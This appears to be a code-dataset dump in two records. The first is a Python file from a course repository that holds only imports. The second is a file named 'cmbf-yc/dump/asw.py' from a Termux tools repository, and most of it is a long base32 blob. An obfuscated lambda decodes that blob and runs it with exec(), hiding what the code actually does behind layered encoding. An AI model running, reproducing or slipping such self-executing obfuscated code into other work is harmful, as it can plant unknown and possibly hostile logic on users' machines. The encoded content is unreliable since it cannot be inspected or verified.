franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 1
|
2020-12-21T15:29:20.000Z
|
2022-01-15T12:06:09.000Z
|
Chapter11_DeepQNetworksAtari/1_Start/pongDqnWrappers.py
|
franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 4
|
2020-11-08T17:07:53.000Z
|
2022-02-07T06:40:55.000Z
|
import collections
from typing import Any
from typing import Deque
from typing import Tuple
import gym
import numpy as np
| 15.375
| 24
| 0.829268
| 20
| 123
| 5.1
| 0.55
| 0.294118
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 123
| 7
| 25
| 17.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
22bfa5f535b8114af00f54daed184ac9e5fb0b52
| 27,756
|
py
|
Python
|
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
# ENCRYPTED BY Boy HamzaH
# Subscribe to my YouTube channel
# And don't forget to follow my GitHub
exec((lambda _____, ______ : ______(eval((lambda ____,__,_ : ____.join([_(___) for ___ in __]))('',[95, 95, 105, 109, 112, 111, 114, 116, 95, 95, 40, 34, 98, 97, 115, 101, 54, 52, 34, 41, 46, 98, 51, 50, 100, 101, 99, 111, 100, 101],chr))(_____),"<haMzah>","exec"))(b'EMQEKQ2SLFIFIICCLEQEE33ZEBEGC3L2MFEAUIZAKN2WE43DOJUWEZJAINXWWICDNBQW4ZLMEBMW65KUOVRGKICHOVQSAQLONJUW4ZYKEMQEIYLOEBFGC3THMFXCATDVOBQSARTPNRWG65ZAI5UXI2DVMIQEO5LBBJSXQZLDFAUGYYLNMJSGCIC7L5PV6XZMEBPV6X27L5PSAORAL5PV6X27L4UGK5TBNQUCQ3DBNVRGIYJAL5PV6XZML5PSYXZAHIQF6X27L4XGU33JNYUFWXZIL5PV6KJAMZXXEIC7L5PSA2LOEBPV6XJJFEUCOJZMLM4TKLBAHE2SYIBRGA2SYIBRGA4SYIBRGEZCYIBRGEYSYIBRGE2CYIBRGE3CYIBZGUWCAOJVFQQDIMBMEAZTILBAHE4CYIBZG4WCAMJRGUWCAMJQGEWCANJUFQQDKMRMEAZTILBAGQYSYIBUGYWCAOJYFQQDKMJMEA2TALBAGEYDALBAGEYDCLBAHE4SYIBRGEYSYIBRGAYCYIBRGAYV2LDDNBZCSKJIL5PV6X27FEWCEPDIMFGXUYLIHYRCYITFPBSWGIRJFEUGEJ2FJVIUKS2RGJJUYRSJIZEUSQ2DJRCVCRKFGMZVURKCIVDUGM2MGJGUMRKBKVEVUQKLJYZFORJUGNCE6SSVK5CVUSSBJFHFQV2XJFBUITSCKFLTIWSMJVCUETKXGY2UWVKPKZJEOS2JINEE6VSRKNAVCTCPJZFFKVZULJMUWRKNKFCUSWKMJ5CUERSHIMZVISCNIZMEGQKUIRLE6QSRKNAVEVCQJZJFORZWGVNECSJVKVMESMSEKZGUSUKFJ42UYQSCJJJVQUK2JRCEMQKVI5MVSTCOJVFFGR2DJFBTOTBVKBLDMWC2JVCUEUCWGZMDEN2MGVIFGQKPKJAUYNKQKY3FQMRXJQ2FKR2LGVKEETSRKVBVCM2EIJHFMUSHJFMUUQKMGVIFMNSYLJGUYNKQKNMVQWSBJBEVCRRWLAZDOTBULBDVKMZTJJHFSVKGK5MFUSKMGVIFMNSLJJAU2WSYLBCUSQZXJQ2VAU2BGJGE6RKCKBLDMWCKJJDEKVKDJ5FFUTKMJU2FIS2MIJAUQRJSKNMUSQSSI5ATEU2ZJFBFER2BGRJVSSKCKJDUKWSDLFEUEUSHIVMVGWKJIJJEORJSINMUSQSSI5CTGQ2ZJFBFUR2VK5BUCT2KKZDFCUKEJFGUETKFIFNFISKMIJAUQRJUINMUSQS2I42FOQ2BJVFFER2VK5BUCTKKKFDUKV2DIFHEUVKGKFIUIS2NKJGUKQK2KREUYQSBI5IVSU2ZJFBFKR2ZK5BUCT2KLFDFCUKEJNGUUTKFIEZFIQKMIJAUORKZIRAUYQSBI5CVSRCDJRBECSCFGRJVSSKCKJDUKWKTLFEUEUSHIFMUGWKJIJJEOQKZKYZEYRCEJZBFUQ2TJNFESTBVKBLDMWBSG5DEKV2DIVIEISKNIZDVQVKZJREUQWKSINMUSVCGKBBFGV2HJFJEURSFKVDUKSRSIZFFMSKVJNJTEUSHJJFFKWKSKNFESWSFKVJVCMSEJJJEGVSDKJFUMR2NLJLFKUSLINEVMRCVI5GTETKHJJDVKTKSJNBEWVSFKZKVCS2MJJMVURSPKJFFKR2OINCTMU2TKZFTKQ2WKVJVGQSKIZEEMUKWGJMEURSCKVEVIU2DJNDEYVCJK5JU2SSWINKUKVCLLBDVSMSVK5LEWUCLLJFEKT2TGJFESTSFIU3FMU2SJNHECVSDKRBVASS2IZDEWVS2KVGEUTKVK5JEWTSLIZBVKU2XJNGUUNKDKVCVEU2IJFGVUVSJKNBU4SK2JVCUOUKLKVEVETCFGZIVGUSLJZAVMRKWINIUUWSKIZHVEWSXI5LE4RKDKNFFMS2WJVCVGTKTIVFVUR2VKNKUWRSKGQZFKWKRKNBUUSSKKZIVKSZSJJJEGRKNKFFVMSJVJVLFGVCDJ5FFMRSGI5JDERCKIZBFIT2UIJLEWQSMIRGVOQZSJJLEGVKFKVBVOR22JVCEKTRSJVDVMSKGI5IUWUCLJJAVKWKOJNIUWWJTIZIU2USYJJITERSLKIZEYR2WJNCUKVCTKJFVMQSWINGTERKJJJEEMTKVKNEEURSNKVKVCS2NI5LESRSNJZJVSTCKI5KVSTSLKFFU4TKWKFLVGQSKIJCVMQ2SKJLUYQK2IRHVIQSVJRBEIVSLJVNFISSKJBDFGVSLI5FTKTKGKVJUWTKHKZEUMTKOKNGEUSSBKUZFOU2ZJRBEGVKTKFNFQSSRGJLECVJSIJDUUR2FGZJEWQ2LIJGEITKXINFUUSSEIVFVMS2EJI2UMRSVKRFU2SSVGJDESUZSJVEUUQKVKFJEUU2LJZGVKU2RKNJUSNKBKRCVKMS2JJDEERSFKIZEER2SJJLFGU2LINFUURCVJNLVGRCMIZCVKRKVKNEESVSNKZDVOS2KJFFEURKPKJFFGSKOJVKVGUKTKNETKQ2UI5ITEWSKIZBEMVKSGJLEWNKCKVBVIMSLJNNEIRSDKVFUKSSGI5KUKVCLIZEUMTSGJFJUWTKJJJAVKUKSJJKUSTSNKVJVCUZSJE2DERSPKEZEESSWIZDEKURSKZFTKQSVINKEWS2LIZCFKS2WGJCESRSIIVKVMS2HJNDESVKJKMZE4S2KI5KUWUKLGJFVERKVLFIVGQSJGVEVMU2VGJNEURSCIZFVEMS2JM2UEVKDKQZEWTCGIRDEGVKLIVFE4R2VKVKEWRSJIVNEMSKRJNGUSSSBKVHVES22JFJECVKZKFJUESJVINLFGUSDIRFFEQSFINJUGRSHKJFFMU2TJNBUWSSEKVFVOS2UJRDEKVKFKVJUQSKGJVKUOV2LJJEUUSSFJ5IUWWSLLFNEKWKSINCUUWSCIZKVCMSUJJHEMRKTKRBFMS2CJRCE2V2CKNDTKRCFJNLDERCJKZEUKSKTJNHESWSEKZIVMS22JJJEKVKRK5FVGSKOJVKVGVSDI5FUEQSGI5LDESCKIZFEKVKSKNDEWVSEKVFVGUSTJFNEMRSNKNFVMSSOJJKEKVKTJBFEURSGJNLUWU2LJZDEKU2XKNDEWVSKKZBU2U2FJJFEURKHKZJUIS2KIZKU2URSJZGEUTCGJNKVGTCJJZCVMTKSINLESNKHKRCVIS2IJJFEIVSLKRFVGSSOIJCVOVSTIZFVUS2WINJTETKKJJGVMVKSKNIEWSSGIZFVEMSPJFHEGVCNKUZFIS22IZKEWUJSK5FVMSSWI5IVGS2JLJCUKTK
VJNLUOSSNIVKVEU2DJNLEKVSJKUZEISSOIRCVSVSDJJFTKSSVGJJVGV2JJZFVKS2WINGEYQSEKZJU2U2WJM2UYRKXKVBUYTCKIZCUWVBSKRDUURSFKNKFGRSJKUZUMTKVGJJUUTSIIVBVMU2EJNJEEVSBKNJTESK2IRCVOVSTGJFVMR2FKVKEWVSLGVFEKV2UKNGESWSCKZFVKMSYJJHEOVKVJZFUIS2WINLEKVJSJFFEMR2WKVLFGSSLJZBFKNCTJMZEUVSDKVHVKS2MJNLEKVSFKRBUMR22JFLEOVKTJRFFUQKWJVJEWV2JJZEVKVKXKNFUSWSIKZCVOU2YJE2UYRJUKJFUIS2OIZDE2UZSK5FFMQ2WI5KEWVCJKZDFMVKSGJLEWTSLKVLVEU2LI5IVURSLK5FVES2OIJKVKU2TJNFVUSKWJNJVUU2KJJFEKR2SJNHEWRSGKZGVGSSWJJLEYRSHKZBUISRVIZDE2USTI5ETKSSEIVJEGS2JLJBEMSKUGJKUSSSMIVLVCU2NJFJEOVSPKFNFGSSKJRCUOVSLIZFVMQSWJ5JDEMSKKZBUKS2UKJJUUVSEKZGVGS2HJE2USVKXKVBUYSSKIFLEWV2LJ5FE4SKVK5LUUVCJLJEVKMSVKNMUUSSJKRCVEU2MJNEVURKZKIZFOSSOINKUWVSDKRFUURSWJVIVGV2JJZDVIRKSJNFEUSSFIVGVIS2WJNHEKRKVKJJU4S2WJNLEGUZSJZETKTCFKNJFGTSKLJFFMU2UINFUSNKLKZJVIU2MJNDEMVJUKRFVOS2GJRLEOUKTJNEUUQ2WJVITEU2LJJGFKWKRJMZESUSIKZEVCU2WJJJEERKJKZJUYSSWJZDESU2TJNFEERCGI5LFGTCJGVDFIS2UJNDUWVSKKVLVIS2IJNNEKVKNKRFU6S2OI5CVKU2TIJFVKWSGJ5KTEWSKKJBEKR2WJNKEWRSOIZIVGU2SI5FEYRKDKZFFGSKKIRKVKURSIZDVUSSFK5ITETCJJJDUKSKUJNMESTSGKVKVGU2FJFLEMVSNKMZEKSSJGJKU2USTKZFVERSVGJJVGVSHJJCEKU2VLJJUUVSFKVKVCS2WJNDEURKVKUZEYSS2I5LEWVJSKJFU4SSVKNHEWQSLKJBVMS2NKMZEUSSEIVCVEU2GJNEVURKFKIZFGSSKJRDEOVJSJREU4RSVKVJEGVSKJZGFMR2SINGUSWSDKZFVES2WJNHEKRKTKZJU4S22IRLE6UZSJNFEMRSFKVJEWUCLJJDEMR2TJNHUUVSLKZDVKS2UJNHEKVCLKEZFKSJVJFKEKV2TJNEVUQSFJVLEWU2HJJGEKV2OJNBUWVSCKZEU2U2MJJHE4RKJKJJUIS2WIZKUWU2TI5ETKS2VJNLEGTCJLJCVKTKUKNDUURSKKVLVIS2KJJFECVSLKVFVGSSKJNKVGVCTJZFVMSSWINKVUU2KIUZEIRKSKNIEWRK2IVCVGU2XJFNEIRKLKVJFGS22IZKEWUKTKZEU4S2FK5JTETCJLJBUMS2TGJLUOSSDIVJVEU2JJFLEWVSNKMZEQSSOIRCVGVSLJJFU2WSFGRJTES2JGVFVKV2VJNGEOSSGKZCVES2WJRDESVSHKFJUUR2WIVLE2VJSKZDUUTSFKVJFGQ2JLJDFMRKNKMZEUTJSKVCVMS2EJNIVURKXKRBUOSKSIRCUOVSLJREVMRSFGRJDEVSLKZFUKV2SKNFESVSOIVGVGS2SJJHEOVKTKNJUES2WJBLEKUZSGJFEMSSFINLEWWSLIZFFKRKTJJLESTSMIZDVKU2EJFJEMRSFKFJUMSKOJJKUOUSTJBFUURSGJVKTEVCKJZBFKV2TKNCUWVSGKZHVGMSVJJJEIRKLKZFUMS2WJJKVCU2LI5FFMS2VJ5LDETCKJJCVKVKTKNDEUNKJKVLVOU2MJRDE4RKLK5FVGSKOINKVKV2TINEVUS2WINGVGVKKJJEEKTKSJNKEWUSCIZGVGMSDJJJEGRJSKYZEGS2OIRKEWUSDIZFE4TCEIVJEGSSLLJCVKS2TJNKEUTSIIVJVOU2FJNNESVSNKMZDESSKJJCUWVSLKJFTKRSWI5JUWT2KKZFVMR2WKNCESNKGKVCVCU2HJE2UYRCFKNBUWSK2IZCUWVSLKNFU4RCFK5LFGRKLKZDFMR2VKNKEURSOIVGVEU2OJNHEMVSNKNJU6SSKJNCUWVSLKRFEERSFKVJFGR2KJZGFKV2VGJGEUWSEIVFVKMSYJNHEIRKXKZJUWS22IJKTEVJSIZFEURSFKVJEWSCLLJFFKSKTGJFUSWSLKUZFKUSTJJNEORKVKRBUOSSOJNLEOVCDJJFFUQ2WJVKEWU2JJZGEKU2OJNEEWUSDKZEVGMSJJJFEMRKJKZJUYS2SIZLEOU2TJ5EUUQ2WJ5LFGVCJLJDFMVKTGJLUSTSKKRCVIS2LJJFEOVSNKZFVGS2OJFCVOU2TI5EVURSWIVGVGUCKIZEEKR2WINHEWVK2IZEVGMRSJFNEWRKXKVFFGSZVIZLE2U2TK5ETKSKWI5JTESSMJJBVKS2UJNLEUTSMKVHVGU2OJFLEWVSFKUZEISSOJRCUWVSTJJFVKWSFJFJVGT2JKJBVMU2WKNCEUSSGKRFVGU2WI5FEUVSHKYZEUSS2IZLEWUZSK5EU4R2FLFIVGRKLLJFFKMSVGJLUUTJSKVMVES2YJNLEEVKZKRBUWSK2INKVOVSCKNFVERCVKVJFGRSLJZFUMR2SKNFEWVK2KVGVIS2WI5FEUVKVKRJUSSKWIJLE2VJSIVFE4SSFIVLFGQSLJZFFIRKTJMZESUSDKZHVMU2UI5FEMVSNKIZEMS2WJNCVOVSTJRDVMRSFJNLDEVKLJZDUKU2XKNBUWWSGKZFU2U2ZJJFEQRKPKZFVMSS2IZKUSUZSK5EU4TCFJNLEUU2KIZDEKTKSGJLUWVSMIZDVGU2MJJNEERSLJZBVISSNLJCVKVSTIRFVMSCWJNJTETKKJZGEKS2WKNDEWUSCKVGVEMRSJJDEYRKPKZFVISSSIZDFKUKLK5FFMSSFK5LDESSKLJCVMS2WJNMEWTSGKVJVOU2JJNNEGVSPKUZFSSSFGJKVSUSKKVFUURSVJFJTET2JLJCEKMSVLJJUWNKGIZGVCMSXJE2UWRKXKZBUUS22IRDE2VSLKNDUUTCFK5KFGTCLKZGFMRKVGJGESNKJKZKVEU2MJM2UMVSFKMZE6SKKJNLEWVJSKRFE4RSWKVJUWV2KJZFFMVKVGJFUUSSGIVFVEMSTJJHEQRKXKJJUOS22I5LEOU2TK5FEUTCFLFJFGSCLLJBFKSKTKJLESWSEIUZFKU2UJE2UKVCLKNJUKSKWJJCUOUZSJJGEUQSFJVJUWVKHJJFVKU2TKNGUSVSMKZBVKMSOJJDEURKPKZJVAS2GJZDEOU2TJNFFEQ2VJ5LFGTCJLJDFMTKRKNLUUNKKIRCU2U2LJNNEEVKLKMZFKS2KJJKVKVSTIVFVUR2WI5JTESCKIUZFKU2WJNMEWVSCKVMVGU2LJFDEYRKXKYZEYSRVIZ
CTIU2LKZFTKTCVKVLEGSSMJJCVMS2NKNLEWTSNKVKVGU2KJNJEGVSFKUZE2SSOIVLFKUSLLJFUSWSGJ5JVGT2JJZFVKV2WKNCEWUSGKVKVEU2XJJLESVSHKYZEUSS2IRLESUSLKNFE4RSFKVJVGRSJKZDVMSKTGJLUUTSIIVFVES2WJNFEUVJUKMZFOSSOJRCUOVK2KNFFURKUJNKEGRSLJZFEMR2UKNFUYSSGIZGVKMSVJFHEMVKTJZFUYS22JJLESVJSJVFE4RCFJVLEUVKLKJDFMT2TGJDUUUSMIVHVKS2UJJHEKVKVKEZFOSSWJFKEKVJSJRFEUR2GJNLUWUSKJVNEKU2VKNEUWWSFKZBVKMSXJJFEURKFKJFUUS22JJKVSU2TK5FFURCFKNKTEVCKJZDEKRKSINDUSNKMIZDVIQ2KI5LEIRSJKMZFKSSOIRKVOVSTJNFVMTCWJFJTESKKJZHEKS2WJNHEWUSGKU3FGMSPJE2UGVSLKUZFISKKIZLEWV2TI5FDKS2UIVLVGS2LJJBEKS2SGJLUUTSLIVLVEU2PJFNESVSHKUZFGSJVIZCVSUSLIRFVURSGI5JUWS2JKJFVMS2VKJJUSWSEKZKVGU2GJM2USVCFKRBUUSSKIRKUWU2LKVFE4TKFKNKFGR2LKZFVMR2VGJDEURSMIVGVMU2OJNGVURKLKNJUUR2KJNKTEVKTKRFVURSWIVJFGVSHJJFFMR2WKNEEUSSDIVFVKMSWJRFEUVKVKZJUMS2WJNLEGUZSK5FE4RCFKVJEWVSLKVNEKWKTKMZESNKMIVLVMSSTJNFEMVJUKNJVMS2OJBCVOUKTJRFUUQSWJVJTETSLJVNEKVKTKNCUSVSDKZCVKMSHJJHEKVSVKJFUMS2JLJDEOU2TJNFFERCFJ5LEUU2KKJCVKNCSKNLEWVSKIVDVMU2LJJNEORSNKIZFGSKOI5KVGV2TIRFVURSWIVJTEV2KJZEEKS2SJNKEWWSKKU2FGMRSJFJEYRJWKVNFGSSOIZCU2USTIZFVMSSFK5KUGTCKJJCEKTKSGJKEUTSIKVKVMU2MJNNEIVSLKMZFKSSOJBCUWVSDJRFUKWSGJNJUUVSKIZFUKS2WGJKEUTSFKZKVCU2GJJLEYRKXKUZEQSSKI5CUWVRSJ5FE4QSVK5LFGQ2LLJCVKMSVGJGUUSSIIU2FES2KJNFEUVKJKMZFOSK2JNKVOVJSKRETKRKUJNJTEVSKJZGEKR2UINFEYSSDKZFVIS2VJNHEIVKVKJJUWS2WJRLESUZSJNFEURSFINLFGTCLKZDFMR2TKNFUUTSLKZDVMQ2UJJNEMVSNKNJVOSKOJNLFKVJSJNEVKWSFJFJEWU2LJZEUKV2SJMZESVSDKZDVKMSYJJDE4RKJKJFUYS2WJJDEOUZSGJEVUS2FK5KUWVCLLJCVKNCTGJDEWNKKKRCVIQ2KJRFEEVKNKMZFIR2KJRKU6U2TIREVMSSWIVKTESSKIZGEKV2WKNHEWTK2IVIVGU2PJFJEGVSHKZJUYSSKIZKTEV2TIZDVESSUIVJTESSHKZDFMS2WGJLEUTSHIVHVGU2HJNNEGVSFKMZFOSSSIRCVGVSTJBFUMSSVKVJDEV2JKZGEKMSWJJJUWWSEKVKVIU2GJNLEURSHKEZEUTCKIRDE2USLJZFU2WSFKVKEUU2LKZBVMTKTGJCUUTSJKZKVES2YJNJEEVKPKNFVGSKSINKU6VSTJRFFERKWJVJFGRSHKJFEIRKWKNGEWWSGKVFVMMSTJNHEMRKTKZJU6SKWI5LEOUZSKNFEUSCFJ5LEWVCLJZFFKRKTGJLUUQSMIVFVKWSTI5FEMRKNKNJUMSKOJRCVOV2TJREVURSGJNJEWVCKJJGEKU2UKNGUSWSEKZFVKMSFJJDEURKNKJJUMS2GJJKU2U2LJ5FEUS2VJ5KVGVCKIJDFKVKSKNDUUVSLKRCVMQ2LJJNEERSLKYZFIS2OINKVOVSTI5FVUSCWI5GVGVSKJJFEKSKSJNGEWWSGKVGVGMSXJJFEWVSDKUZEYSJVIZDE2UZSKZFDKTCEIVKEGS2KJJBVMS2WJNKEWTSEIVKU4S2KJNLEYVSPKUZE2SSSIRCTIUSLJRFTKRSWI5JUWT2JJZFVMS2WGJKESTSFKZKVGMSXJFHEOVSHKZFUWSSKIVCUWVCLKNFE4S2FK5KVGQ2JLJDVMR2NKNCEUSSKIVDVESSTJNMVURKHKMZE6SKSJNCVOVKTIREVURSFGRKEGRKJKZFEKR2TKNGEYSSDKZFVGMSUJJHEWRKVKRJUSSKWJJLE6VJSIZFE4TSFKNLFGTSLJVNEIRKTKNFUUSSDKVLVMU2MJNFEMVCLKJJVOSJVJJKVOVBSJNFVURSWJVJDEV2LJZBUKU2OJNDUWVSDKZBVKMSIJJCTEVKZKJBUMS2OIJKVOU2LGJEVUQ2VK5LFGTCLJZDFKNCSINDEWNKMIZDVES2MJNNEIRSNKIZFMS2OJNCVKUSTJ5EVMR2WIVKTET2KJZEEKTKWKNHEWTSKKU3FGU2LJJHEGVKXKZJUYS2SIZCUKUSTIZFVMSSGI5JDES2KLJDUMS2WGJLEOSSHIVKVOU2FJFLEMVSLJVJVSSSOJBCUSUSLLBFVUSSVK5JTEMSJJJFVIRKWJJJUSWSGIVKVEU2GJNLEURKXKNBUYTCKIZDEWU2LKRDUURSVKNLVGTCLKVNEMS2VKNKEUSSOIVHVES2WJNJEEVKPKNJU6SSOJRCU6VSDIRFEURSGKVITEV2KKZFUKV2VGJFEUWSHIVFVKMSPJJHEKRKXKVJUIS22IVLEOTKTJJFEURSFJVJEWSSLLJFFKWKTGJJUSWSMIVHVKMSUJI2UKVKVKEZFOSRVJRDEOVSDJJGEURCGJVLEWVCHJJGFKU2UKNFUWUSDKZEVGMSMJJFEMRKPKZJU4S22IZLEOUZSJ5FEMQ2WJ5KTEVCJGVCVMVKSKNLUSVSHKZDVKQ2LJFNEKRKLKIZFOSKOJBCVOVSLGJEVURKWI5GVEU2KIZHEKV2SJNMEWVSGIZDVGWSWJFNEYRJSKUZFISZVIVKEWU2LK5ETKSSUIVJVGTKKJJBFMS2TGJKUUTSMIVKVIU2NJNLEQVSHKUZE6SSGJRCVOVSTIZFVKWSFJFJVGT2KKJBVKV2WKNKEUSSGKZFVOU2GJJDEUVSHKQZEUS2KIJLE2VJSK5FU4Q2FKVJVGR2LKJDFMR2VGJLUSNKGIVKVMU2IJNMVURKVKNJTESK2JRCVOVK2KNFTKRKVGRJDERSMIZEVMR2SJNGEYSSGIZFU2U2WI5FEYVKVKRFFGS2WJVLEKUZSLFFE4TCFIVLEWWSLKJBFKV2TJMZESTSLKZHVMU2DJNHEMVSFKJBVMS2WJJDEOUSTJRFFURSVJVJDEU2LJZDEKV2WJMZEWVSHKZEVGMSXJE2UMRKVKZFVMS2SJJKVGU2LK5EUUTCFGJLEUU2JKZDEKNCTKNDESVSMIZDVCU2MJJNEMRSJKJFVISSNLJCVGVKTIRFVUSCWJVKTEVKJGVDEKTKWKNHEW
SK2IVGVGMSXJJHEGVSPKZJVISSSIRLE2USTIZFE4TCEIVLEWTCKLJCFKS2VGJMEWTSCKVLVOU2HJNNEMVJSKUZFUSSKIZCVCUSLKBFVURSWJVJVGMSJLJFVKU2VLJJUWNKFKU2FIQ2GJJHEYRKVKUZEWSK2IRCUWVCLKNDUUTCVK5LFGTKJLJCFMR2VGJGUUSSOIVCVEU2MJJNEEVSJKNJU4TCKINLEWVSTKREVERSWJVJUGV2KJZFFIRKUJNFUUWSHIVFVGMSXJNHEIRKXKVJUGS2WI5LEKTKSKNFEURCFLFJEWUCLLJDFMSKTKNJUSWSEIZFVKS2MJM2UMRSNKNJUMSZVJRCEKU2TJNGEUQ2WJVJTEV2KJZGUKV2UKNDUWVSKKZHVKMSKJJHE4RKHKZJVAS2VLJDFGU2TIZDUUS2WKNKVGS2LKZDFKVKSKNLEURSKKRCVIMSKJRFEGRKLJVJVMTCKJJKVOTSLI5EVUR2WINGVGWCKIUZFKV2SJNMEWWSCKVKVGMRSJFJEIRJSKZJUYS2OIRKVKVCDIZFTKS2GI5KEGTCLLJDUMTKSJNLEOSSHIVJU4S2KJNNEWVSFKUZE2SSNGJKU2VSTIZFU2WSFGZJUWS2KJZGEKV2WJJJUWUSGIU2FEU2XJNLEUVKXKYZEWSS2IZDE2VSLKZDUURSVKVJVGR2JKZDFMRKNKNKEUSSIIVIVES2YJNFEUVKPKMZDESJVJRCU6VJSKRFTKRSFKVKEGRSMIZFEMR2TINGEYSSCIZFVGS2UJNFEYRKTK5JUKSKVLJDEWVJSKVFEKMSVJNLEGTCLJZFFKS2TJNLUUSSDKVHVKWSTJJFEORKVKFJUMSSWJJKVOVSLJBFEURSWJNKTEVCLJZDVKU2WKNGUWWSCKZFU2U2PJJFEIRKVKJFVAS22JJLECUZSI5FFURCFJ5KTEVCKJZDEMRKRGJLEUNKMIZDVIQ2KJRFEIRSNKRFVES2OJRKVKTSLJNEVEQ2VGJKTETCKJZHEKRKWJNGEWTK2IZFVGMSLJJFEWVSLKZJVISKWIZLFKURSK5ETKSSUIVJUGS2JKVNEMS2VGJLUUTSNIVLVMU2DJNLE2VSHKUZEYSSGIRCVSUSLLBFVSWSFLFJVEVSJLJBVISKVGJGEWWSGKRFVIQ2WJNLEYRKHKNJU2SSKINLE2UZSJZFU4TCFK5KFGTSLKZFVMR2VGJFUUTSKIVDVMU2GJNKVURJSKNJU6SKWJRDEWVKTJRGEURSVKNLVGR2KGVFFMR2UGJFEUWSGKZFVMMSXJNHEGRKXKVJUOS2WJNLEKVJSLBFEUTCFKNLFGSCLLFNEKVKTKMZESUSMIVJVKU2MJNHEMRJUKJJUMS2WJJLEOUSTJJFVURCWJVJUWVCHJJGFKVKUKNEUSVSGKZCVGMSXJJHEMRKVKZFFKS2NLJDE6U2TJ5FFEQ2VJ5LEWMSLJZDEMVKSJNKUUTSLIVDVEU2MJJNEMRKNKIZFKS2OIZKVSU2TI5EVUR2WJNGVGVSKIZEEKTKWJNKEUWSGKVMVGMRSJJFEYRKTKZFFGSSWIZCTIUSDIZFFMTCFKVLEWTCLJJCEMTKUGJKEOSSEKVKVKU2NJFLEQVSLKMZFKSSKJBCUWVSLKZFUKWSGJ5JVGV2KIZFUKS2WJJJUUUSGIVKVEMSHJJHEYVKXKVJUWSSWJZCUWVJSKZFU4RKVK5LVGRSLLJBFMS2NKNMEUSSGIVKVES2GJNFEMVKVKMZDESSKJNLFGVJSKRFTKRSGKVJEGRSLJZFVIRKWINFUUWSEIVFVES2TJFHEIVKTJZFU2SK2IRLESUJSJNETKTCFJFJFGSSLJVNEMS2TKNHUSUSLKZHVMU2UJJHEMVSNKRBVOSSGJJKEKU2LJNFFUSCFJNJTEV2KJZEEKV2VKNDUWVJTIZDU2U2QJJCTEVKHKZJUYS2VLJDESU2LJNEVUTCFK5LDEVCJGVDEIS2TGJKUSVSMKZDVGMSMJJFEERKLKMZFGR2KJRKVKVCTJREVMTCWIVKTEUCKIZHEKU2WKNEEWVK2IZDVGSSWJFNEGVSTKVJUYSKSIZLFKUSTI5ETKSSVK5JTESSLJJDFMTKTGJLEWSSKKVJVOU2FJNNEWVSHKUZEOSSNGJKVGVSDIZFVEQSVKVJVGS2JKJFVKV2VGJGEWVSGIU2FIS2GJNHEWRSHKIZEYS22IZLE2URSKZDUURCFKVJFGTKJKZDVMTKVGJHUUTSHKZKVES2MJNHEUVKVKIZEWSSOJNKEKVSLKRFVERSWKVJFGV2JKZFEMR2WKNEEUSSGIZGVEMSXJNHEKRKVKNJUISKWIZLEWTKTK5FFERSFKVLEWVSLLJFFKTKTGJLUUTSMIVDVKWSTJM2UMRJUKJBUMS2WJJCVOVSTJRFVMTSFJNLUWVCLJVNEKU2OJNGUSVSMKZGVGU2UJJHEMRKNKZFFKS2OJJLE2UZSJ5FEEQ2WJ5KUWVCKKJDFKVKRKNLUUVSKKRCVIU2MJJLE4RKLKZFVIS2OINKVGVSTIRFVUQ2WJNGVGSCKJJEEKS2WKNLEWSSGKVGVGMSKJRFEIRKPKUZFISSOIZDEKUSDIZFDKTCFKVKTES2LJJBVMS2OINJUWTSMIVLVMU2LJFLEIVSNKUZEYSSKJZCU6USTJZFUSWSGI5JUWT2JGVFVMR2WGJKESUSGKZKVEU2XJFLEUVCFKYZEWSS2IVCUWUZSKNFE4S2FK5LVGS2LKUZEMR2NKJJUURSKIVMVESSXJNLE4RSHKNJU6SK2INKTEVKTKREVURSWJVJVGRSLGVFVKR2UINFUUSSDIVFVIS2TI5FEWRKVKRJUSS2WJNLE2VJSJVFE4TSFJFLFGTCLJVNEMS2TKNHUUQSDKVLVMU2EJJJEMVKLK5JUOSSOJJKVKVSTJNEVURSVJNJTEV2HJJFUKVKUKNDEWWSLKZBVKMSHJJFEYRKZKJFVQS2VLJCVCU2TJNETKQ2VK5LFEU2KGVDEKNCRKNLEWNKMIZDVCMSMJRFEGVSLJVJVMR2KI5KVKU2TJFEVKMSGIVJTES2KJZDEKVKWJNFEWTK2IZHVGSZSJJHEWVSPKZFFGS2SIVKEWUSLKVFE4SSUIVLFGS2KLJDUKS2SGJKUSTSGIVMVGU2EJNNEMVSJKMZFMSSOJBCUSVSLKZFUUSSVK5JTEV2KKJGEKU2VLJJUUTSGIVKVEU2GJFHEYRSHKRBUYS22IRDE2URSKRFU4RSVKVKFGTCLLJCFMTKRGJKUUSSOIVGVMU2OJNHEUVSPKNFU6SSOJRDEWVSKKNFE4RKWJNLVGRSKIZFEKV2VGJGEUWSFKVFVMMSTJJGVURKTKZJUIS22IRLEWTKTLFFEURCFGRJEWSSLJJDFKWKTGJLUUSSEIVHVKWSTI5FEKVSVKMZEMSZVJNKVOVSDJRGEUQ2WJNHEGVCHJJCEKV2OJNFUWUSDKZEVCMSLJJJEMRKFKZFU4S2NLJDESURSJNFFES2VGZKTEVCJKJCVMTKTKNLUSVSLKRCVGU2LJFNEORKLKYZFOS2OJBCVOVCL
